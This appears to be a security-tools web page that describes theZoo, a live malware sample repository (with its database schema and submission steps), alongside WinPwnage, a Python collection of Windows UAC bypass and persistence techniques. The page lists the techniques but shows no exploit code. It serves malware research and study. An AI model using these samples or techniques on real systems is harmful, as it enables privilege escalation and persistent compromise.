We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware.

Root Files

/conf

The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.

/imports

Contains .py and .pyc import files used by the rest of the application

/malwares/Binaries

The actual malwares samples.

/malware/Source

Malware source code.

Also Read UploadScanner : HTTP file upload scanner for Burp Proxy

theZoo Directory Structure

Each directory is composed of 4 files:

  • Malware files in an encrypted ZIP archive.
  • SHA256 sum of the 1st file.
  • MD5 sum of the 1st file.
  • Password file for the archive.

Structure of maldb.db

maldb.db is the DB which theZoo is acting upon to find malware indexed on your drive. The structure is as follows:

uid,location,type,name,version,author,language,date,architecture,platform,comments,tags
  • UID – Determined based on the indexing process.
  • Location – The location on the drive of the malware you have searched for.
  • Type – Sorts the different types of malware there are. So far we sort by: Virus, Trojans, Botnets, Ransomware, Spyware
  • Name – Just the name of the malware.
  • Version – Nothing to say here as well.
  • Author – … I’m not that into documentation…
  • Programming Language – The state of the malware in regard to source, bin, or which type of source. c/cpp/bin…
  • Date – See ‘Author’ section.
  • Architecture – The arch the platform was build for. Can be x86, x64, arm7….
  • Platform – Win32, Win64, *nix32, *nix64, iOS, android and so on.
  • Comments – Any comments there may be about the item.
  • Tags – Tags matching the item.

An example line will look as follow:

104,Source/Original/Dexter,trojan,Dexter,2,unknown,c,00/05/2013,x86,win32,NULL,Source

Submit Malware

Get the file you want to submit and just run python prep_file.py file_tosubmit.exe. It will create a directory for you. Then just submit that along with the changes to the conf/maldb.db so that we know which malware it is.

Credit: Yuval Nativ, Lahad Ludar, 5fingers

WinPwnage – Elevate, UAC Bypass, Privilege Escalation, dll Hijack Techniques

WinPwnage meaning is to study the techniques. Techniques are found online, on different blogs and repos here on GitHub. I do not take credit for any of the findings, thanks to all the researchers.

Rewrote them and ported it to Python 2.7. The code under todo folders are not tested, do not expect it to work.

Techniques Implemented In WinPwnage

  • UAC bypass using fodhelper
  • UAC bypass using computerdefaults
  • UAC bypass using slui
  • UAC bypass using silentcleanup
  • UAC bypass using compmgmtlauncher
  • UAC bypass using sdclt (isolatedcommand)
  • UAC bypass using sdclt (App Paths)
  • UAC bypass using perfmon
  • UAC bypass using eventviewer
  • UAC bypass using sysprep (dll payload supported)
  • UAC bypass using migwiz (dll payload supported)
  • UAC bypass using mcx2prov (dll payload supported)
  • UAC bypass using cliconfg (dll payload supported)
  • Persistence using userinit
  • Persistence using image file execution option
  • Persistence using hklm run
  • Persistence using hkcu run
  • Persistence using schtask (SYSTEM privileges)
  • Persistence using explorer dll hijack
  • Persistence using WMI (SYSTEM privileges)

Also Read Nemesis – A Command Line Network Packet Crafting & Injecting Utility

Installing Dependencies

pip install -r requirements.txt

Build

In order for a successful build, install the py2exe module and use the provided build.py script to compile all the scripts in to a portable executable. On Windows 10, Access Denied errors can accrue while compiling, rerun until success or elevate the prompt.

Screenshot